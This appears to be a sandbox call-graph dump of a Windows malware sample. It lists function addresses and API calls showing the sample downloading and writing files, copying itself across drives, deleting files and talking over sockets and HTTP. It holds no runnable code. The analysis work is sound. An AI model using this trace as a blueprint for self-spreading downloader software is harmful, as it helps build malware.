4956->4951 4957 40a5db memcpy 4956->4957 4957->4951 4959 40996e 4958->4959 4961 40992e 4958->4961 4959->4944 4961->4959 4962 409860 6 API calls 4961->4962 4962->4961 4964 409e8a 4963->4964 4966 409e80 4963->4966 4964->4966 4973 409cb0 4964->4973 4966->4947 4968 409fc8 memcpy 4968->4966 4970 409fe7 memcpy 4971 40a111 4970->4971 4972 409e70 62 API calls 4971->4972 4972->4966 4974 409cbd 4973->4974 4975 409cc7 4973->4975 4974->4966 4974->4968 4974->4970 4975->4974 4976 409d50 4975->4976 4978 409d55 4975->4978 4979 409d38 4975->4979 4984 409610 4976->4984 4980 409920 6 API calls 4978->4980 4982 409920 6 API calls 4979->4982 4980->4976 4982->4976 4983 409dfc memset 4983->4974 4985 40961f 4984->4985 4986 409629 4984->4986 4985->4974 4985->4983 4986->4985 4987 4094e0 9 API calls 4986->4987 4988 409722 4987->4988 4989 40a950 __aligned_recalloc_base 7 API calls 4988->4989 4990 409771 4989->4990 4990->4985 4991 409350 46 API calls 4990->4991 4992 40979e 4991->4992 4993 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4992->4993 4993->4985 5013 40a800 GetCurrentProcessId 4994->5013 4996 40a99b 4997 40a820 __aligned_recalloc_base 5 API calls 4996->4997 5002 40a9a7 __aligned_recalloc_base 4996->5002 4997->5002 4998 40aaa0 __aligned_recalloc_base HeapValidate 4998->5002 4999 40aa50 HeapAlloc 4999->5002 5000 40aa1a HeapReAlloc 5000->5002 5001 40ab60 __aligned_recalloc_base 3 API calls 5001->5002 5002->4998 5002->4999 5002->5000 5002->5001 5003 405d55 5002->5003 5003->4774 5003->4775 5007 40cb4b 5004->5007 5005 40a950 __aligned_recalloc_base 7 API calls 5005->5007 5006 405ded 5006->4775 5008 4076c0 5006->5008 5007->5005 5007->5006 5009 40a950 __aligned_recalloc_base 7 API calls 5008->5009 5010 4076d0 5009->5010 5011 407717 5010->5011 5012 4076dc memcpy CreateThread 5010->5012 5011->4775 5012->5011 5014 407720 GetTickCount srand rand Sleep 5012->5014 5013->4996 5015 4077ad 5014->5015 5021 407757 5014->5021 5016 4077ab 5015->5016 5017 40f560 58 API calls 5015->5017 5018 40ab60 __aligned_recalloc_base 3 API calls 5016->5018 5017->5016 5020 4077d8 5018->5020 5019 407766 StrChrA 5019->5021 5021->5016 5021->5019 5024 40f560 9 API calls 5021->5024 5025 40f623 InternetOpenUrlW 5024->5025 5026 40f78e InternetCloseHandle Sleep 5024->5026 5027 40f781 InternetCloseHandle 5025->5027 5028 40f652 CreateFileW 5025->5028 5029 40f7b5 6 API calls 5026->5029 5046 407795 Sleep 5026->5046 5027->5026 5030 40f681 InternetReadFile 5028->5030 5050 40f75e 5028->5050 5031 40f831 wsprintfW DeleteFileW Sleep 5029->5031 5029->5046 5032 40f6d4 wsprintfW DeleteFileW Sleep 5030->5032 5033 40f6a5 5030->5033 5034 40f240 18 API calls 5031->5034 5052 40f240 CreateFileW 5032->5052 5033->5032 5035 40f6ae WriteFile 5033->5035 5036 40f871 5034->5036 5035->5030 5038 40f87b Sleep 5036->5038 5039 40f8af DeleteFileW 5036->5039 5041 40f400 6 API calls 5038->5041 5039->5046 5043 40f892 5041->5043 5043->5046 5047 40f8a5 ExitProcess 5043->5047 5044 40f767 DeleteFileW 5044->5050 5045 40f72b Sleep 5048 40f400 6 API calls 5045->5048 5046->5021 5049 40f742 5048->5049 5049->5050 5051 40f756 ExitProcess 5049->5051 5050->5027 5053 40f285 CreateFileMappingW 5052->5053 5054 40f386 5052->5054 5053->5054 5055 40f2a6 MapViewOfFile 5053->5055 5056 40f3a0 CreateFileW 5054->5056 5057 40f3f1 5054->5057 5055->5054 5058 40f2c5 GetFileSize 5055->5058 5059 40f3c2 WriteFile 5056->5059 5060 40f3e8 5056->5060 5057->5044 5057->5045 5061 40f2e1 5058->5061 5062 40f37c UnmapViewOfFile 5058->5062 5059->5060 5063 40ab60 __aligned_recalloc_base 3 API calls 5060->5063 5072 40d1a0 5061->5072 5062->5054 5063->5057 5066 40cb40 7 API calls 5067 40f330 5066->5067 5067->5062 5068 40f34d memcmp 5067->5068 5068->5062 5069 40f369 5068->5069 5070 40ab60 __aligned_recalloc_base 3 API calls 5069->5070 5071 40f372 5070->5071 5071->5062 5073 40cbd0 10 API calls 5072->5073 5074 40d1c4 5073->5074 5074->5062 5074->5066 5076 40e1bd htons inet_addr setsockopt 5075->5076 5081 40e2ee 5075->5081 5077 40b430 8 API calls 5076->5077 5078 40e236 bind lstrlenA sendto ioctlsocket 5077->5078 5084 40e28b 5078->5084 5081->4563 5082 40e2b2 5132 40b4f0 shutdown closesocket 5082->5132 5083 40a990 9 API calls 5083->5084 5084->5082 5084->5083 5123 40e310 5084->5123 5139 40e640 memset InternetCrackUrlA InternetOpenA 5085->5139 5089 40ab60 __aligned_recalloc_base 3 API calls 5090 40e51e 5089->5090 5090->4563 5094 40e4eb 5094->5089 5097 40e4e1 SysFreeString 5097->5094 5246 40b3f0 inet_addr 5100->5246 5103 40b48c connect 5104 40b4a0 getsockname 5103->5104 5105 40b4d4 5103->5105 5104->5105 5249 40b4f0 shutdown closesocket 5105->5249 5107 40b4dd 5108 40eef0 5107->5108 5250 40b3d0 inet_ntoa 5108->5250 5110 40ef06 5111 40d470 11 API calls 5110->5111 5112 40ef25 5111->5112 5117 40e14c 5112->5117 5251 40ef70 memset InternetCrackUrlA InternetOpenA 5112->5251 5115 40ab60 __aligned_recalloc_base 3 API calls 5118 40ef5c 5115->5118 5116 40ab60 __aligned_recalloc_base 3 API calls 5116->5117 5117->4569 5118->5116 5122 40ac84 5119->5122 5120 40ac8a 5120->4562 5121 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5121->5122 5122->5120 5122->5121 5128 40e32c 5123->5128 5124 40e3f4 5124->5084 5125 40e348 recvfrom 5126 40e376 StrCmpNIA 5125->5126 5127 40e369 Sleep 5125->5127 5126->5128 5129 40e395 StrStrIA 5126->5129 5127->5128 5128->5124 5128->5125 5129->5128 5130 40e3b6 StrChrA 5129->5130 5133 40d320 5130->5133 5132->5081 5134 40d32b 5133->5134 5135 40d331 lstrlenA 5134->5135 5136 40a950 __aligned_recalloc_base 7 API calls 5134->5136 5137 40d344 5134->5137 5138 40d360 memcpy 5134->5138 5135->5134 5135->5137 5136->5134 5137->5128 5138->5134 5138->5137 5140 40e6e1 InternetConnectA 5139->5140 5141 40e41a 5139->5141 5142 40e84a InternetCloseHandle 5140->5142 5143 40e71a HttpOpenRequestA 5140->5143 5141->5090 5152 40e530 5141->5152 5142->5141 5144 40e750 HttpSendRequestA 5143->5144 5145 40e83d InternetCloseHandle 5143->5145 5146 40e830 InternetCloseHandle 5144->5146 5148 40e76d 5144->5148 5145->5142 5146->5145 5147 40e78e InternetReadFile 5147->5148 5149 40e7bb 5147->5149 5148->5147 5148->5149 5150 40a990 9 API calls 5148->5150 5149->5146 5151 40e7d6 memcpy 5150->5151 5151->5148 5181 40d250 5152->5181 5155 40e433 5155->5094 5162 40eea0 5155->5162 5156 40e55a SysAllocString 5157 40e571 CoCreateInstance 5156->5157 5158 40e627 5156->5158 5159 40e61d SysFreeString 5157->5159 5161 40e596 5157->5161 5160 40ab60 __aligned_recalloc_base 3 API calls 5158->5160 5159->5158 5160->5155 5161->5159 5198 40e9f0 5162->5198 5165 40e870 5203 40ecc0 5165->5203 5170 40ee20 6 API calls 5171 40e8c7 5170->5171 5177 40e4b2 5171->5177 5220 40eae0 5171->5220 5174 40e8ff 5174->5177 5225 40e990 5174->5225 5175 40eae0 6 API calls 5175->5174 5177->5097 5178 40d470 5177->5178 5241 40d3e0 5178->5241 5185 40d25d 5181->5185 5182 40d263 lstrlenA 5182->5185 5187 40d276 5182->5187 5184 40a950 __aligned_recalloc_base 7 API calls 5184->5185 5185->5182 5185->5184 5185->5187 5188 40ab60 __aligned_recalloc_base 3 API calls 5185->5188 5189 405740 5185->5189 5193 4056f0 5185->5193 5187->5155 5187->5156 5188->5185 5190 405757 MultiByteToWideChar 5189->5190 5191 40574a lstrlenA 5189->5191 5192 40577c 5190->5192 5191->5190 5192->5185 5194 4056fb 5193->5194 5195 405701 lstrlenA 5194->5195 5196 405740 2 API calls 5194->5196 5197 405737 5194->5197 5195->5194 5196->5194 5197->5185 5201 40ea16 5198->5201 5199 40e49d 5199->5094 5199->5165 5200 40ea93 lstrcmpiW 5200->5201 5202 40eaab SysFreeString 5200->5202 5201->5199 5201->5200 5201->5202 5202->5201 5205 40ece6 5203->5205 5204 40e88b 5204->5177 5215 40ee20 5204->5215 5205->5204 5206 40ed73 lstrcmpiW 5205->5206 5207 40edf3 SysFreeString 5206->5207 5208 40ed86 5206->5208 5207->5204 5209 40e990 2 API calls 5208->5209 5211 40ed94 5209->5211 5210 40ede5 5210->5207 5211->5207 5211->5210 5212 40edc3 lstrcmpiW 5211->5212 5213 40edd5 5212->5213 5214 40eddb SysFreeString 5212->5214 5213->5214 5214->5210 5216 40e990 2 API calls 5215->5216 5217 40ee3b 5216->5217 5218 40ecc0 6 API calls 5217->5218 5219 40e8a9 5217->5219 5218->5219 5219->5170 5219->5177 5221 40e990 2 API calls 5220->5221 5222 40eafb 5221->5222 5224 40e8e5 5222->5224 5229 40eb60 5222->5229 5224->5174 5224->5175 5226 40e9b6 5225->5226 5227 40e9cd 5226->5227 5228 40e9f0 2 API calls 5226->5228 5227->5177 5228->5227 5230 40eb86 5229->5230 5231 40ec9d 5230->5231 5232 40ec13 lstrcmpiW 5230->5232 5231->5224 5233 40ec93 SysFreeString 5232->5233 5234 40ec26 5232->5234 5233->5231 5235 40e990 2 API calls 5234->5235 5237 40ec34 5235->5237 5236 40ec85 5236->5233 5237->5233 5237->5236 5238 40ec63 lstrcmpiW 5237->5238 5239 40ec75 5238->5239 5240 40ec7b SysFreeString 5238->5240 5239->5240 5240->5236 5245 40d3ed 5241->5245 5242 40d390 _vscprintf wvsprintfA 5242->5245 5243 40d408 SysFreeString 5243->5097 5244 40a990 9 API calls 5244->5245 5245->5242 5245->5243 5245->5244 5247 40b409 gethostbyname 5246->5247 5248 40b41c socket 5246->5248 5247->5248 5248->5103 5248->5107 5249->5107 5250->5110 5252 40ef47 5251->5252 5253 40f014 InternetConnectA 5251->5253 5252->5115 5252->5118 5254 40f194 InternetCloseHandle 5253->5254 5255 40f04d HttpOpenRequestA 5253->5255 5254->5252 5256 40f083 HttpAddRequestHeadersA HttpSendRequestA 5255->5256 5257 40f187 InternetCloseHandle 5255->5257 5258 40f17a InternetCloseHandle 5256->5258 5261 40f0cd 5256->5261 5257->5254 5258->5257 5259 40f0e4 InternetReadFile 5260 40f111 5259->5260 5259->5261 5260->5258 5261->5259 5261->5260 5262 40a990 9 API calls 5261->5262 5263 40f12c memcpy 5262->5263 5263->5261 5270 407417 5264->5270 5265 407670 CoCreateInstance 5265->5270 5266 4075eb 5268 4075f4 SysFreeString 5266->5268 5269 4073bb SysFreeString 5266->5269 5267 40ab60 __aligned_recalloc_base 3 API calls 5267->5266 5268->5269 5269->4572 5270->5265 5271 407566 SysAllocString 5270->5271 5272 407432 5270->5272 5271->5270 5271->5272 5272->5266 5272->5267 5274 40c87a 5273->5274 5275 40c87e 5273->5275 5274->4578 5277 40c830 CryptAcquireContextW 5275->5277 5278 40c86b 5277->5278 5279 40c84d CryptGenRandom CryptReleaseContext 5277->5279 5278->5274 5279->5278 5280->4596 5332 40b780 gethostname 5281->5332 5284 40b869 5284->4596 5286 40b87c strcmp 5286->5284 5287 40b891 5286->5287 5336 40b3d0 inet_ntoa 5287->5336 5289 40b89f strstr 5290 40b8f0 5289->5290 5291 40b8af 5289->5291 5339 40b3d0 inet_ntoa 5290->5339 5337 40b3d0 inet_ntoa 5291->5337 5294 40b8bd strstr 5294->5284 5296 40b8cd 5294->5296 5295 40b8fe strstr 5297 40b90e 5295->5297 5298 40b94f 5295->5298 5338 40b3d0 inet_ntoa 5296->5338 5340 40b3d0 inet_ntoa 5297->5340 5342 40b3d0 inet_ntoa 5298->5342 5302 40b95d strstr 5305 40b96d 5302->5305 5306 40b9ae EnterCriticalSection 5302->5306 5303 40b8db strstr 5303->5284 5303->5290 5304 40b91c strstr 5304->5284 5307 40b92c 5304->5307 5343 40b3d0 inet_ntoa 5305->5343 5310 40b9c6 5306->5310 5341 40b3d0 inet_ntoa 5307->5341 5317 40b9f1 5310->5317 5345 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5310->5345 5311 40b93a strstr 5311->5284 5311->5298 5312 40b97b strstr 5312->5284 5313 40b98b 5312->5313 5344 40b3d0 inet_ntoa 5313->5344 5316 40baea LeaveCriticalSection 5316->5284 5317->5316 5319 40a740 7 API calls 5317->5319 5318 40b999 strstr 5318->5284 5318->5306 5320 40ba35 5319->5320 5320->5316 5346 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5320->5346 5322 40ba53 5323 40ba80 5322->5323 5324 40ba76 Sleep 5322->5324 5326 40baa5 5322->5326 5325 40ab60 __aligned_recalloc_base 3 API calls 5323->5325 5324->5322 5325->5326 5326->5316 5347 40b530 5326->5347 5328->4604 5330 40b530 13 API calls 5329->5330 5331 40b523 LeaveCriticalSection 5330->5331 5331->4598 5333 40b7a7 gethostbyname 5332->5333 5334 40b7c3 5332->5334 5333->5334 5334->5284 5335 40b3d0 inet_ntoa 5334->5335 5335->5286 5336->5289 5337->5294 5338->5303 5339->5295 5340->5304 5341->5311 5342->5302 5343->5312 5344->5318 5345->5317 5346->5322 5348 40b544 5347->5348 5349 40b53f 5347->5349 5350 40a950 __aligned_recalloc_base 7 API calls 5348->5350 5349->5316 5352 40b558 5350->5352 5351 40b5b4 CreateFileW 5353 40b603 InterlockedExchange 5351->5353 5354 40b5d7 WriteFile FlushFileBuffers 5351->5354 5352->5349 5352->5351 5355 40ab60 __aligned_recalloc_base 3 API calls 5353->5355 5354->5353 5355->5349 5359 40dcdd 5356->5359 5357 40dc13 5357->4611 5357->4612 5358 40dd01 WaitForSingleObject 5358->5359 5359->5357 5359->5358 5365 407840 5360->5365 5361 407868 Sleep 5361->5365 5362 40791a Sleep 5362->5365 5363 407897 Sleep wsprintfA DeleteUrlCacheEntry 5390 40f4b0 InternetOpenA 5363->5390 5365->5361 5365->5362 5365->5363 5366 40f560 58 API calls 5365->5366 5366->5365 5368 4058c9 memset GetModuleHandleW 5367->5368 5369 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5368->5369 5369->5369 5370 405940 CreateWindowExW 5369->5370 5371 40596b 5370->5371 5372 40596d GetMessageA 5370->5372 5373 40599f ExitThread 5371->5373 5374 405981 TranslateMessage DispatchMessageA 5372->5374 5375 405997 5372->5375 5374->5372 5375->5368 5375->5373 5397 40f1f0 CreateFileW 5376->5397 5378 4070f8 ExitThread 5380 406fa0 5380->5378 5381 4070e8 Sleep 5380->5381 5382 406fd9 5380->5382 5400 4063e0 GetLogicalDrives 5380->5400 5381->5380 5406 406300 5382->5406 5384 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5387 407086 wsprintfW 5384->5387 5388 40709b wsprintfW 5384->5388 5386 40700b 5387->5388 5412 4068e0 _chkstk 5388->5412 5391 40f4d6 InternetOpenUrlA 5390->5391 5392 40f548 Sleep 5390->5392 5393 40f4f5 HttpQueryInfoA 5391->5393 5394 40f53e InternetCloseHandle 5391->5394 5392->5365 5395 40f534 InternetCloseHandle 5393->5395 5396 40f51e 5393->5396 5394->5392 5395->5394 5396->5395 5398 40f238 5397->5398 5399 40f21f GetFileSize 5397->5399 5398->5380 5399->5398 5405 40640d 5400->5405 5401 406486 5401->5380 5402 40641c RegOpenKeyExW 5403 40643e RegQueryValueExW 5402->5403 5402->5405 5404 40647a RegCloseKey 5403->5404 5403->5405 5404->5405 5405->5401 5405->5402 5405->5404 5407 406359 5406->5407 5408 40631c 5406->5408 5407->5384 5407->5386 5471 406360 GetDriveTypeW 5408->5471 5411 40634b lstrcpyW 5411->5407 5413 4068fe 7 API calls 5412->5413 5442 4068f7 5412->5442 5414 4069d2 5413->5414 5415 406a14 PathFileExistsW 5413->5415 5416 40f1f0 2 API calls 5414->5416 5417 406ac4 5415->5417 5418 406a29 PathFileExistsW 5415->5418 5420 4069de 5416->5420 5419 406af5 PathFileExistsW 5417->5419 5476 4064a0 7 API calls 5417->5476 5421 406a59 PathFileExistsW 5418->5421 5422 406a3a SetFileAttributesW DeleteFileW 5418->5422 5425 406b06 5419->5425 5426 406b47 PathFileExistsW 5419->5426 5420->5415 5424 4069f5 SetFileAttributesW DeleteFileW 5420->5424 5427 406a6a CreateDirectoryW 5421->5427 5428 406a8c PathFileExistsW 5421->5428 5422->5421 5424->5415 5429 40f1f0 2 API calls 5425->5429 5431 406b58 5426->5431 5432 406bca PathFileExistsW 5426->5432 5427->5428 5430 406a7d SetFileAttributesW 5427->5430 5428->5417 5433 406a9d CopyFileW 5428->5433 5437 406b12 5429->5437 5430->5428 5431->5432 5438 406b64 PathFileExistsW 5431->5438 5434 406c75 FindFirstFileW 5432->5434 5435 406bdf PathFileExistsW 5432->5435 5433->5417 5439 406ab5 SetFileAttributesW 5433->5439 5434->5442 5468 406c9c 5434->5468 5440 406bf0 5435->5440 5441 406c2c 5435->5441 5436 406ad4 5436->5419 5443 40f1f0 2 API calls 5436->5443 5437->5426 5444 406b28 SetFileAttributesW DeleteFileW 5437->5444 5438->5432 5445 406b73 CopyFileW 5438->5445 5439->5417 5447 406c12 5440->5447 5448 406bf8 5440->5448 5451 406c34 5441->5451 5452 406c4e 5441->5452 5442->5386 5450 406aed 5443->5450 5444->5426 5445->5432 5446 406b8b SetFileAttributesW PathFileExistsW 5445->5446 5446->5432 5453 406bab SetFileAttributesW DeleteFileW 5446->5453 5457 406660 4 API calls 5447->5457 5487 406660 CoInitialize CoCreateInstance 5448->5487 5449 406d5e lstrcmpW 5456 406d74 lstrcmpW 5449->5456 5449->5468 5450->5419 5458 406660 4 API calls 5451->5458 5454 406660 4 API calls 5452->5454 5453->5432 5459 406c0d SetFileAttributesW 5454->5459 5456->5468 5457->5459 5458->5459 5459->5434 5460 406f35 FindNextFileW 5460->5449 5462 406f51 FindClose 5460->5462 5462->5442 5463 406dba lstrcmpiW 5463->5468 5464 406e21 PathMatchSpecW 5465 406e42 wsprintfW SetFileAttributesW DeleteFileW 5464->5465 5464->5468 5465->5468 5466 406e9f PathFileExistsW 5467 406eb5 wsprintfW wsprintfW 5466->5467 5466->5468 5467->5468 5469 406f1f MoveFileExW 5467->5469 5468->5449 5468->5460 5468->5463 5468->5464 5468->5466 5492 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5468->5492 5469->5460 5472 406388 5471->5472 5474 40633f 5471->5474 5473 40639c QueryDosDeviceW 5472->5473 5472->5474 5473->5474 5475 4063b6 StrCmpNW 5473->5475 5474->5407 5474->5411 5475->5474 5477 406640 InternetCloseHandle 5476->5477 5478 40653e InternetOpenUrlW 5476->5478 5477->5436 5479 406633 InternetCloseHandle 5478->5479 5480 40656b CreateFileW 5478->5480 5479->5477 5481 406626 5480->5481 5482 406598 InternetReadFile 5480->5482 5481->5479 5483 4065eb wsprintfW DeleteFileW 5482->5483 5484 4065bc 5482->5484 5483->5481 5484->5483 5485 4065c5 WriteFile 5484->5485 5485->5482 5488 406696 5487->5488 5491 4066ee 5487->5491 5489 4066a9 wsprintfW 5488->5489 5490 4066cf wsprintfW 5488->5490 5488->5491 5489->5491 5490->5491 5491->5459 5493 4067f5 lstrcmpW 5492->5493 5494 4068cf 5492->5494 5495 40680b lstrcmpW 5493->5495 5499 406821 5493->5499 5494->5468 5497 406823 wsprintfW wsprintfW 5495->5497 5495->5499 5496 40689c FindNextFileW 5496->5493 5500 4068b8 FindClose RemoveDirectoryW 5496->5500 5498 406886 MoveFileExW 5497->5498 5497->5499 5498->5496 5499->5496 5500->5494 5868 40d980 5874 4021b0 5868->5874 5871 40d9bf 5872 40d9a5 WaitForSingleObject 5878 401600 5872->5878 5875 4021cf 5874->5875 5876 4021bb 5874->5876 5875->5871 5875->5872 5876->5875 5899 402020 5876->5899 5879 401737 5878->5879 5880 40160d 5878->5880 5879->5871 5880->5879 5881 401619 EnterCriticalSection 5880->5881 5882 401630 5881->5882 5883 4016b5 LeaveCriticalSection SetEvent 5881->5883 5882->5883 5888 401641 InterlockedDecrement 5882->5888 5890 40165a InterlockedExchangeAdd 5882->5890 5896 4016a0 InterlockedDecrement 5882->5896 5884 4016d0 5883->5884 5885 4016e8 5883->5885 5886 4016d6 PostQueuedCompletionStatus 5884->5886 5887 40dd50 11 API calls 5885->5887 5886->5885 5886->5886 5889 4016f3 5887->5889 5888->5882 5892 40de90 6 API calls 5889->5892 5890->5882 5891 40166d InterlockedIncrement 5890->5891 5893 401c50 4 API calls 5891->5893 5894 4016fc CloseHandle CloseHandle WSACloseEvent 5892->5894 5893->5882 5920 40b4f0 shutdown closesocket 5894->5920 5896->5882 5897 401724 DeleteCriticalSection 5898 40ab60 __aligned_recalloc_base 3 API calls 5897->5898 5898->5879 5900 40a740 7 API calls 5899->5900 5901 40202b 5900->5901 5902 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5901->5902 5908 4021a5 5901->5908 5903 402076 CreateIoCompletionPort 5902->5903 5904 40219f 5902->5904 5903->5904 5905 40208f 5903->5905 5906 401600 35 API calls 5904->5906 5907 40dbb0 8 API calls 5905->5907 5906->5908 5909 402094 5907->5909 5908->5875 5909->5904 5910 40209f WSASocketA 5909->5910 5910->5904 5911 4020bd setsockopt htons bind 5910->5911 5911->5904 5912 402126 listen 5911->5912 5912->5904 5913 40213a WSACreateEvent 5912->5913 5913->5904 5914 402147 WSAEventSelect 5913->5914 5914->5904 5919 402159 5914->5919 5915 40217f 5916 40dbe0 16 API calls 5915->5916 5918 402194 5916->5918 5917 40dbe0 16 API calls 5917->5919 5918->5875 5919->5915 5919->5917 5920->5897 5933 406085 5935 405ffe 5933->5935 5934 40608a LeaveCriticalSection 5935->5934 5936 40abd0 8 API calls 5935->5936 5937 40605c 5936->5937 5937->5934 5501 406fc6 5504 406fa8 5501->5504 5502 4070e8 Sleep 5502->5504 5503 406fd9 5505 406300 4 API calls 5503->5505 5504->5502 5504->5503 5506 4070f8 ExitThread 5504->5506 5509 4063e0 4 API calls 5504->5509 5507 406fea 5505->5507 5508 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5507->5508 5510 40700b 5507->5510 5511 407086 wsprintfW 5508->5511 5512 40709b wsprintfW 5508->5512 5509->5504 5511->5512 5513 4068e0 79 API calls 5512->5513 5513->5510 5938 40f908 5939 40f910 5938->5939 5941 40f9c4 5939->5941 5944 40fb45 5939->5944 5943 40f949 5943->5941 5948 40fa30 RtlUnwind 5943->5948 5945 40fb5a 5944->5945 5947 40fb76 5944->5947 5946 40fbe5 NtQueryVirtualMemory 5945->5946 5945->5947 5946->5947 5947->5943 5949 40fa48 5948->5949 5949->5943 5514 40df50 5517 40bf20 5514->5517 5528 40bf31 5517->5528 5520 40ab60 __aligned_recalloc_base 3 API calls 5521 40c2ff 5520->5521 5522 40c310 21 API calls 5522->5528 5524 40b830 31 API calls 5524->5528 5525 40bf4f 5525->5520 5527 40bed0 13 API calls 5527->5528 5528->5522 5528->5524 5528->5525 5528->5527 5531 40c460 5528->5531 5538 40bc00 EnterCriticalSection 5528->5538 5543 407240 5528->5543 5548 4072e0 5528->5548 5553 407110 5528->5553 5560 407210 5528->5560 5532 40c471 lstrlenA 5531->5532 5533 40cb40 7 API calls 5532->5533 5534 40c48f 5533->5534 5534->5532 5536 40c49b 5534->5536 5535 40ab60 __aligned_recalloc_base 3 API calls 5537 40c51f 5535->5537 5536->5535 5536->5537 5537->5528 5540 40bc18 5538->5540 5539 40bc54 LeaveCriticalSection 5539->5528 5540->5539 5563 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5540->5563 5542 40bc43 5542->5539 5564 407280 5543->5564 5546 407279 5546->5528 5547 40dbe0 16 API calls 5547->5546 5549 407280 75 API calls 5548->5549 5550 4072ff 5549->5550 5551 40732c 5550->5551 5579 407340 5550->5579 5551->5528 5590 405fe0 EnterCriticalSection 5553->5590 5555 40712a 5559 40715d 5555->5559 5595 407170 5555->5595 5558 40ab60 __aligned_recalloc_base 3 API calls 5558->5559 5559->5528 5602 4060a0 EnterCriticalSection 5560->5602 5562 407232 5562->5528 5563->5542 5567 407293 5564->5567 5565 407254 5565->5546 5565->5547 5567->5565 5568 405ef0 EnterCriticalSection 5567->5568 5569 40d1d0 71 API calls 5568->5569 5570 405f0e 5569->5570 5571 405fcb LeaveCriticalSection 5570->5571 5572 405f27 5570->5572 5576 405f48 5570->5576 5571->5567 5573 405f31 memcpy 5572->5573 5574 405f46 5572->5574 5573->5574 5575 40ab60 __aligned_recalloc_base 3 API calls 5574->5575 5577 405fc8 5575->5577 5576->5574 5578 405fa6 memcpy 5576->5578 5577->5571 5578->5574 5582 40be30 5579->5582 5583 40c8b0 3 API calls 5582->5583 5584 40be3b 5583->5584 5585 40be57 lstrlenA 5584->5585 5586 40cb40 7 API calls 5585->5586 5587 40be8d 5586->5587 5588 407385 5587->5588 5589 40ab60 __aligned_recalloc_base 3 API calls 5587->5589 5588->5551 5589->5588 5592 405ffe 5590->5592 5591 40608a LeaveCriticalSection 5591->5555 5592->5591 5593 40abd0 8 API calls 5592->5593 5594 40605c 5593->5594 5594->5591 5596 40a950 __aligned_recalloc_base 7 API calls 5595->5596 5597 407182 memcpy 5596->5597 5598 40be30 13 API calls 5597->5598 5599 4071ec 5598->5599 5600 40ab60 __aligned_recalloc_base 3 API calls 5599->5600 5601 407151 5600->5601 5601->5558 5627 40d230 5602->5627 5605 4062e3 LeaveCriticalSection 5605->5562 5606 40d1d0 71 API calls 5607 4060d9 5606->5607 5607->5605 5608 4061f8 5607->5608 5610 406134 memcpy 5607->5610 5609 406221 5608->5609 5611 405d30 70 API calls 5608->5611 5612 40ab60 __aligned_recalloc_base 3 API calls 5609->5612 5613 40ab60 __aligned_recalloc_base 3 API calls 5610->5613 5611->5609 5614 406242 5612->5614 5615 406158 5613->5615 5614->5605 5616 406251 CreateFileW 5614->5616 5617 40abd0 8 API calls 5615->5617 5616->5605 5618 406274 5616->5618 5619 406168 5617->5619 5622 406291 WriteFile 5618->5622 5623 4062cf FlushFileBuffers 5618->5623 5620 40ab60 __aligned_recalloc_base 3 API calls 5619->5620 5621 40618f 5620->5621 5624 40cb40 7 API calls 5621->5624 5622->5618 5623->5605 5625 4061c5 5624->5625 5626 4076c0 66 API calls 5625->5626 5626->5608 5630 40c780 5627->5630 5631 40c791 5630->5631 5632 40abd0 8 API calls 5631->5632 5633 40c7ab 5631->5633 5634 40c6e0 70 API calls 5631->5634 5637 4084a0 68 API calls 5631->5637 5638 40c7eb memcmp 5631->5638 5632->5631 5635 40ab60 __aligned_recalloc_base 3 API calls 5633->5635 5634->5631 5636 4060c2 5635->5636 5636->5605 5636->5606 5637->5631 5638->5631 5638->5633 5639 401f50 GetQueuedCompletionStatus 5640 402008 5639->5640 5641 401f92 5639->5641 5642 401f97 WSAGetOverlappedResult 5641->5642 5646 401d60 5641->5646 5642->5641 5643 401fb9 WSAGetLastError 5642->5643 5643->5641 5645 401fd3 GetQueuedCompletionStatus 5645->5640 5645->5641 5647 401ef2 InterlockedDecrement setsockopt closesocket 5646->5647 5648 401d74 5646->5648 5649 401e39 5647->5649 5648->5647 5650 401d7c 5648->5650 5649->5645 5666 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5650->5666 5652 401d81 InterlockedExchange 5653 401d98 5652->5653 5654 401e4e 5652->5654 5653->5649 5657 401da9 InterlockedDecrement 5653->5657 5658 401dbc InterlockedDecrement InterlockedExchangeAdd 5653->5658 5655 401e67 5654->5655 5656 401e57 InterlockedDecrement 5654->5656 5659 401e72 5655->5659 5660 401e87 InterlockedDecrement 5655->5660 5656->5645 5657->5645 5662 401e2f 5658->5662 5675 401ae0 WSASend 5659->5675 5661 401ee9 5660->5661 5661->5645 5667 401cf0 5662->5667 5664 401e7e 5664->5645 5666->5652 5668 401d00 InterlockedExchangeAdd 5667->5668 5669 401cfc 5667->5669 5670 401d53 5668->5670 5671 401d17 InterlockedIncrement 5668->5671 5669->5649 5670->5649 5681 401c50 WSARecv 5671->5681 5673 401d46 5673->5670 5674 401d4c InterlockedDecrement 5673->5674 5674->5670 5676 401b50 5675->5676 5677 401b12 WSAGetLastError 5675->5677 5676->5664 5677->5676 5678 401b1f 5677->5678 5679 401b56 5678->5679 5680 401b26 Sleep WSASend 5678->5680 5679->5664 5680->5676 5680->5677 5682 401cd2 5681->5682 5683 401c8e 5681->5683 5682->5673 5684 401c90 WSAGetLastError 5683->5684 5685 401ca4 Sleep WSARecv 5683->5685 5686 401cdb 5683->5686 5684->5682 5684->5683 5685->5682 5685->5684 5686->5673 5687 40db50 5692 401b60 5687->5692 5689 40db65 5690 40db84 5689->5690 5691 401b60 16 API calls 5689->5691 5691->5690 5693 401b70 5692->5693 5711 401c42 5692->5711 5694 40a740 7 API calls 5693->5694 5693->5711 5695 401b9d 5694->5695 5696 40abd0 8 API calls 5695->5696 5695->5711 5697 401bc9 5696->5697 5698 401be6 5697->5698 5699 401bd6 5697->5699 5700 401ae0 4 API calls 5698->5700 5701 40ab60 __aligned_recalloc_base 3 API calls 5699->5701 5702 401bf3 5700->5702 5703 401bdc 5701->5703 5704 401c33 5702->5704 5705 401bfc EnterCriticalSection 5702->5705 5703->5689 5708 40ab60 __aligned_recalloc_base 3 API calls 5704->5708 5706 401c13 5705->5706 5707 401c1f LeaveCriticalSection 5705->5707 5706->5707 5707->5689 